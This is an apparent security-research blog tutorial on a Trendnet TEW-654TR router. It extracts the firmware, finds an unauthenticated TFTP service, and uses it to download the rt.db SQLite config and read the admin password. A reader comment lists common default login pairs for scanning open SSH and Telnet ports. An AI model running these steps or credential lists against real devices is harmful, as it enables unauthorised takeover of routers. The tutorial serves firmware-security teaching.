So far our tutorials have focused on extracting file systems, kernels and code from firmware images. Once we have a firmware image dissected into something we can work with, the next step is to analyze it for vulnerabilities.
Our target is going to be the Trendnet TEW-654TR. We’ll be examining many different security holes in this device, but for part 1 we will focus on gaining initial access given only a login page and nothing more. We will assume that we do not have physical access to the target device, nor to any other device for testing or analysis.
If you don’t already have them, you will need to install binwalk and the firmware mod kit.
Let’s get started!
OK, we’ve found a target and we can see from the login page that it is a Trendnet TEW-654TR. It always helps to gather some information about your target, so let’s look at some of the features listed on Trendnet’s product page:
- Supports Router, Access Point and AP Client modes
- Network Address Translation (NAT) and Stateful Packet Inspection (SPI) protect against Internet attacks
- Easy Web browser remote management
While we’re there, let’s also head to Trendnet’s support site and download a copy of the latest firmware update (v1.10 build 12 at the time of this writing).
Running the firmware image through binwalk reveals a pretty standard looking Linux firmware layout:
eve@eve:~/TEW654TR$ binwalk TEW-654TRA1_FW110B12.bin -v Scan Time: Sep 22, 2011 @ 20:19:59 Magic File: /usr/local/etc/binwalk/magic.binwalk Signatures: 70 Target File: TEW-654TRA1_FW110B12.bin MD5 Checksum: 523c7c7f158930894b7842949ff55c48 DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------------------------- 64 0x40 uImage header, header size: 64 bytes, header CRC: 0xE5BE5107, created: Mon May 30 09:00:10 2011, image size: 883118 bytes, Data Address: 0x80000000, Entry Point: 0x80282000, data CRC: 0xB8911044, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: Linux Kernel Image 128 0x80 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2746476 bytes 917568 0xE0040 Squashfs filesystem, little endian, non-standard signature, version 3.0, size: 2776952 bytes, 361 inodes, blocksize: 65536 bytes, created: Mon May 30 09:00:17 2011 917687 0xE00B7 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 942232 0xE6098 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 964027 0xEB5BB LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 986860 0xF0EEC LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1009863 0xF68C7 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1028221 0xFB07D LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1050976 0x100960 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 47596 bytes 1063834 0x103B9A LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 60556 bytes 1083190 0x108736 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 62728 bytes 1096075 0x10B98B LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 53587 bytes 1108762 0x10EB1A LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 63640 bytes 1122742 0x1121B6 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 48555 bytes 1138194 0x115E12 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1159993 0x11B339 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1179451 0x11FF3B LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1197984 0x1247A0 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1218234 0x1296BA LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1235094 0x12D896 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 33224 bytes 1238697 0x12E6A9 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 59152 bytes 1257323 0x132F6B LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 41920 bytes 1270434 0x1362A2 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 34652 bytes 1281426 0x138D92 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1301790 0x13DD1E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 9860 bytes 1304542 0x13E7DE LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 61700 bytes 1317957 0x141C45 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1333299 0x145833 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 26688 bytes 1335163 0x145F7B LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 54920 bytes 1350148 0x149A04 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1372419 0x14F103 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1396232 0x154E08 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1418715 0x15A5DB LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1440677 0x15FBA5 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1464261 0x1657C5 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1488446 0x16B63E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1515155 0x171E93 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 34556 bytes 1519314 0x172ED2 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 49040 bytes 1533960 0x176808 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1553645 0x17B4ED LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1571624 0x17FB28 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 50752 bytes 1584757 0x182E75 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1608729 0x188C19 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1634521 0x18F0D9 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1656201 0x194589 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1676037 0x199305 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1697714 0x19E7B2 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1718346 0x1A384A LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1741453 0x1A928D LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1761635 0x1AE163 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1779758 0x1B282E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1796371 0x1B6913 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1818076 0x1BBDDC LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1838965 0x1C0F75 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1862439 0x1C6B27 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1883258 0x1CBC7A LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1903737 0x1D0C79 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1913134 0x1D312E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1928107 0x1D6BAB LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1948416 0x1DBB00 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1965420 0x1DFD6C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 1982834 0x1E4172 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2000018 0x1E8492 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2016949 0x1EC6B5 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 27768 bytes 2022077 0x1EDABD LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2046208 0x1F3900 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2070850 0x1F9942 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2094816 0x1FF6E0 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2113975 0x2041B7 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2136660 0x209A54 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2160301 0x20F6AD LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2181469 0x21495D LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2200963 0x219583 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2218280 0x21D928 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2236380 0x221FDC LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2258078 0x22749E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2278734 0x22C54E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2299832 0x2317B8 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2319739 0x23657B LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2326855 0x238147 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2347775 0x23D2FF LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2365127 0x2416C7 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2382248 0x2459A8 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2399305 0x249C49 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2416059 0x24DDBB LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 33200 bytes 2422766 0x24F7EE LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2451217 0x256711 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 22972 bytes 2455029 0x2575F5 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2477682 0x25CE72 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 34668 bytes 2485730 0x25EDE2 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 51421 bytes 2502716 0x26303C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 56320 bytes 2505240 0x263A18 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 56662 bytes 2509097 0x264929 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 53056 bytes 2521207 0x267877 gzip compressed data, from Unix, last modified: Mon May 30 09:00:09 2011 2779412 0x2A6914 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2803612 0x2AC79C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 37576 bytes 2815638 0x2AF696 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 23898 bytes 2817417 0x2AFD89 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 45620 bytes 2832461 0x2B384D LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2853902 0x2B8C0E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2516 bytes 2854521 0x2B8E79 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2875770 0x2BE17A LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2508 bytes 2876385 0x2BE3E1 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 63696 bytes 2896777 0x2C3389 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 49736 bytes 2912739 0x2C71E3 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2926198 0x2CA676 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 45848 bytes 2938975 0x2CD85F LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2960914 0x2D2E12 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 1452 bytes 2961392 0x2D2FF0 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 2983182 0x2D850E LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 26972 bytes 2990524 0x2DA1BC LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3010089 0x2DEE29 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 36312 bytes 3020945 0x2E1891 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 52136 bytes 3036956 0x2E571C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3059555 0x2EAF63 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3081633 0x2F05A1 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3104019 0x2F5D13 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3125830 0x2FB246 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 25860 bytes 3131543 0x2FC897 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3148776 0x300BE8 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3165665 0x304DE1 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2972 bytes 3166400 0x3050C0 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3186708 0x30A014 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3203568 0x30E1F0 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3222595 0x312C43 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3238860 0x316BCC LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3252694 0x31A1D6 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3263200 0x31CAE0 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 4696 bytes 3264093 0x31CE5D LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 54996 bytes 3281541 0x321285 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 61492 bytes 3302296 0x326398 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 33292 bytes 3312600 0x328BD8 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3334352 0x32E0D0 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3353951 0x332D5F LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3374384 0x337D30 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3394491 0x33CBBB LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 13312 bytes 3396395 0x33D32B LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3415501 0x341DCD LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3433971 0x3465F3 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3452202 0x34AD2A LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3467771 0x34E9FB LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 22604 bytes 3470488 0x34F498 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 55552 bytes 3487801 0x353839 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 61960 bytes 3503338 0x3574EA LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3524956 0x35C95C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3543874 0x361342 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3565538 0x3667E2 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5632 bytes 3566520 0x366BB8 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3585576 0x36B628 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 48652 bytes 3598572 0x36E8EC LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 51028 bytes 3613956 0x372504 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 44961 bytes 3623032 0x374878 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 65536 bytes 3640273 0x378BD1 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 17176 bytes 3645128 0x379EC8 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 59460 bytes 3662337 0x37E201 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 60536 bytes 3679557 0x382545 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 29759 bytes 3687215 0x38432F LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 8192 bytes 3689455 0x384BEF LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 3038 bytes 3690332 0x384F5C LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 5362 bytes 3693543 0x385BE7 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 496 bytes 3693762 0x385CC2 LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 2888 bytes
The Firmware Mod Kit should be able to automatically extract this firmware image for us:
eve@eve:/opt/firmware-mod-kit/trunk# ./extract-ng.sh ~/TEW654TR/TEW-654TRA1_FW110B12.bin Firmware Mod Kit (build-ng) 0.70 beta, (c)2011 Craig Heffner, Jeremy Collake http://www.bitsum.com Scanning firmware... DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------------------------- 64 0x40 uImage header, header size: 64 bytes, header CRC: 0xE5BE5107, created: Mon May 30 09:00:10 2011, image size: 883118 bytes, Data Address: 0x80000000, Entry Point: 0x80282000, data CRC: 0xB8911044, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: Linux Kernel Image 917568 0xE0040 Squashfs filesystem, little endian, non-standard signature, version 3.0, size: 2776952 bytes, 361 inodes, blocksize: 65536 bytes, created: Mon May 30 09:00:17 2011 Extracting 917568 bytes of header image at offset 0 Extracting squashfs file system at offset 917568 Extracting squashfs files... Firmware extraction successful! Firmware parts can be found in 'fmk/*'
With the file system extracted, one of the first things to look for are any configuration files or start up scripts in the etc directory:
eve@eve:/opt/firmware-mod-kit/trunk/fmk/rootfs/etc$ ls -l total 16 -rwxrwxrwx 1 root root 230 2008-11-10 05:54 fstab -rwxr-xr-x 1 root root 3774 2011-05-30 09:00 icon.ico -rwxrwxrwx 1 root root 109 2008-11-10 05:54 inittab drwxrwxrwx 2 root root 4096 2011-09-22 20:27 rc.d lrwxrwxrwx 1 root root 22 2011-09-22 20:25 resolv.conf -> ../var/etc/resolv.conf
Not much in the way of config files, but the rc.d directory does contain an rcS shell script:
eve@eve:/opt/firmware-mod-kit/trunk/fmk/rootfs/etc$ ls -l rc.d/ total 4 -rwxrwxrwx 1 root root 768 2010-03-23 00:06 rcS eve@eve:/opt/firmware-mod-kit/trunk/fmk/rootfs/etc$ file rc.d/rcS rc.d/rcS: a /bin/ash script text executable
Since the rcS file is usually used to initialize services and environments on start up, it is worthwhile to take a closer look at it:
#!/bin/ash # This script runs when init it run during the boot process. # Mounts everything in the fstab mount -a mount -o remount +w / # Mount the RAM filesystem to /tmp mount -t tmpfs tmpfs /tmp # copy all files in the mnt folder to the etc folder cp -a /mnt/* /etc mkdir -p /var/etc mkdir -p /var/firm mkdir -p /var/log mkdir -p /var/misc mkdir -p /var/run mkdir -p /var/sbin mkdir -p /var/tmp mkdir -p /tmp/var cp -f /etc/udhcpd.conf /var/etc/ cp -f /etc/udhcpd.leases /var/misc/ #Add link for resolv.conf #ln -sf /var/etc/resolv.conf /etc/resolv.conf # Load configure file from Flash /bin/echo "Init System..." system_manager & # Start tftpd /bin/echo "Start Tftpd..." tftpd & #insert cc_dev module for reset packet counter insmod /lib/modules/cc_dev.ko
This script does appear to be run on startup. It creates some temporary directories then runs system_manager, tftpd, and loads a kernel module. The tftpd command is particularly interesting! Let’s take a quick look at the binary:
eve@eve:/opt/firmware-mod-kit/trunk/fmk/rootfs$ find -name tftpd ./sbin/tftpd eve@eve:/opt/firmware-mod-kit/trunk/fmk/rootfs$ file ./sbin/tftpd ./sbin/tftpd: ELF 32-bit LSB executable, MIPS, MIPS-II version 1 (SYSV), dynamically linked (uses shared libs), stripped eve@eve:/opt/firmware-mod-kit/trunk/fmk/rootfs$ strings ./sbin/tftpd /lib/ld-uClibc.so.0 p ,D _init _fini __uClibc_main __deregister_frame_info __register_frame_info _Jv_RegisterClasses bind printf puts fopen tftp_receive tftp_free TFTPswrite __errno_location tftp_send TFTPsread fclose strerror malloc strcpy fork wait tftpd_general exit NumberTimeOut PortTFTP create_socket recvfrom tftp_connection fwrite fread strlen sendto memset select memcpy memcmp preamble_mac execute_smac_cmds ioctl recv save_upload_file tftp_receive_ext tftp_send_ext libputil.so _DYNAMIC_LINKING __RLD_MAP _GLOBAL_OFFSET_TABLE_ napt_session_list libmp.so libsqlite3.so.0 libdbapi.so.1 libc.so.0 _ftext _fdata _edata __bss_start _fbss _end &9' 0-B$ ,!$ 0-!$ $!@ %&! ` '!8@ Creation socket failure bind socket failure. octet TFTP op code is not correct TFTP error TFTP fork error file name is corrupted. TFTP main standard_tftp_server launched on port %d. create socket error %d error mesg: %s send nak failed: %d TFTP receving..... TFTP receive successfully TFTP: out of memory. tftp: write error : %d TFTP timeout tftp: select error : %d tftp: op code is not correct create socket failure %d: TFTP send successfully sendto failure %d TFTPread error : %d opcode not correct
From the function names and strings, this appears to be a pretty straight forward tftp server. Let’s see if we can connect to the tftp server and download a file. We know from the rcS script above that the file /var/etc/udhcpd.conf gets created at boot, so we’ll request that file as a test:
eve@eve:~$ tftp 1.1.1.102 tftp> get /var/etc/udhcpd.conf Received 615 bytes in 0.0 seconds tftp> quit eve@eve:~$ cat udhcpd.conf # Sample udhcpd configuration file (/etc/udhcpd.conf) # The location of the leases file lease_file /var/misc/udhcpd.leases # The location of the pid file pidfile /var/run/udhcpd.pid # Everytime udhcpd writes a leases file, the below script will be called. # Useful for writing the lease file to flash every few hours. notify_file dumpleases # <--- useful for debugging # The following settings are added by system_manager interface br0 opt router 192.168.10.1 option subnet 255.255.255.0 option domain start 192.168.10.101 end 192.168.10.199 option lease 604800 static_lease 00:14:d1:b6:02:86 192.168.10.1
Well it looks like the tftp service is running and accessible. Ideally what we'd like to find is where any sensitive information is stored on the file system so that we can download it through the tftp service.
From the comments in the rcS file, we also know that the system_manager binary is responsible for "load[ing] [the] configure file from Flash". If the system_manager saves the configuration file to a temporary file or to a location in ramdisk, we should be able to retrieve it.
Let's see if there are any file paths referenced by system_manager:
eve@eve:/opt/firmware-mod-kit/trunk/fmk/rootfs$ strings ./usr/bin/system_manager | grep '/' /lib/ld-uClibc.so.0 /etc/default_rt.db /etc/rt.db /etc/default_ap.db /etc/ap.db /etc/default_apc.db /etc/apc.db ln -sf /var/etc/resolv.conf /etc/resolv.conf /etc/scripts/config-vlan.sh 2 0 tar -zxf /etc/www.tgz rm -f /etc/www.tgz cp /www/ap/* /www cp /www/apc/* /www cp /www/rt/* /www rm -rf /www/ap rm -rf /www/apc rm -rf /www/rt cp /usr/bin/my_cgi.cgi /www mkdir -p /var/log/lighttpd /usr/bin/lighttpd -f /etc/lighttpd/lighttpd.conf /var/run/rc.pid telnetd -l /bin/sh & /var/run/manager.pid /var/tmp/wlan_up_time.txt /lib/modules/2.6.21/kernel/drivers/net/wireless/rt2860v2_ap/rt2860v2_ap.ko /lib/modules/2.6.21/kernel/drivers/net/wireless/rt2860v2_sta/rt2860v2_sta.ko /mnt/Wireless/RT2860AP/RT2860AP.dat /etc/Wireless/RT2860AP/RT2860AP.dat /mnt/Wireless/RT2860AP/RT2860STA.dat /etc/Wireless/RT2860AP/RT2860STA.dat echo 1 > /var/tmp/wireless_enable echo 0 > /var/tmp/wireless_enable /var/tmp/wps_status /var/run/wps_gpio.pid /var/tmp/dhcp_server.txt /var/tmp/dhcp_gateway.txt /var/tmp/dhcpc.tmp /usr/share/udhcpc/default.bound-dns /var/misc/udhcpd.leases /var/etc/udhcpd.conf /etc/udhcpd.leases /var/tmp/wan_connect_time.tmp /var/log/FW_log /var/log/message_die_bak echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A POSTROUTING -o %s -s %s/%s -j MASQUERADE echo nameserver %s > /var/etc/resolv.conf echo nameserver %s >> /var/etc/resolv.conf /var/etc/ntp.conf /var/run/timer.pid
The .db files are particularly suspect, as they each appear to have a default backup file. Almost all routers have the ability to restore their default configuration, so they have to store these default settings somewhere; if these .db files are in fact the router's configuration files then this would make sense.
These .db files could be just what we're looking for, but which one should we get? We probably don't want the default files, so that leaves rt.db, ap.db and apc.db. Recall that the device's product page mentioned that it can operate in three different modes: router, access point, and access point client. These files are probably the separate configurations for each mode.
Since the target appears to have remote administration enabled, it is probably not acting as an access point or a client device - a straight access point or client probably wouldn't have a concept of "WAN" vs "LAN" interfaces - so we'll try the rt.db (router) file:
eve@eve:~$ tftp 1.1.1.102 tftp> binary tftp> get /etc/rt.db Received 49152 bytes in 0.1 seconds tftp> quit eve@eve:~$ file rt.db rt.db: SQLite 3.x database
A SQLite database, very interesting! Let's explore it a little with the sqlite3 utility:
eve@eve:~$ sqlite3 rt.db SQLite version 3.6.22 Enter ".help" for instructions Enter SQL statements terminated with a ";" sqlite> .tables advanced_network restore_default wan_static daylight_saving smtp_settings website_filter db_version special_application website_filter_mode dhcp_server static_routing wireless_advanced dmz syslog wireless_basic dynamic_dns time wireless_filter dynamic_routing user wireless_filter_mode ip_filter virtual_server wireless_security lan_settings wan_dhcp wireless_wps log_setting wan_l2tp wizard_setting message wan_pppoe wpa_settings nat_filter wan_pptp remote_management wan_settings sqlite> .schema user CREATE TABLE "user" ("user_name" VARCHAR DEFAULT '', "user_pwd" VARCHAR DEFAULT '', "level" CHAR DEFAULT ''); sqlite> select * from user; admin|asecretpassword|1 user|asecretpassword|0 sqlite>
According to the database, the administrative login is admin:asecretpassword. Let's try it out:
Success! A remote 0-day from some simple firmware analysis; welcome to the wonderful world of embedded security.
This exploit was rather trivial, but this device is chock full of other, more interesting, bugs. We'll explore some more of these vulnerabilities in part 2, so stay tuned!
not big news that if you run a ip scanner looking for opened ports 22 and 23 (ssh and telnel for those who dont know), 50% of the result will have the default login and password
admin admin
admin 1234
admin 123456
root ____
root admin
root 1234
or in some specific cases, if it says the brand, then google the default password and you’re in.
this kind of stuff makes you think they should change the definition of “security” in the dictionary
both the default user and password should calculable from the S/N on the router’s back, or be one time usable so the user is forced to change it.
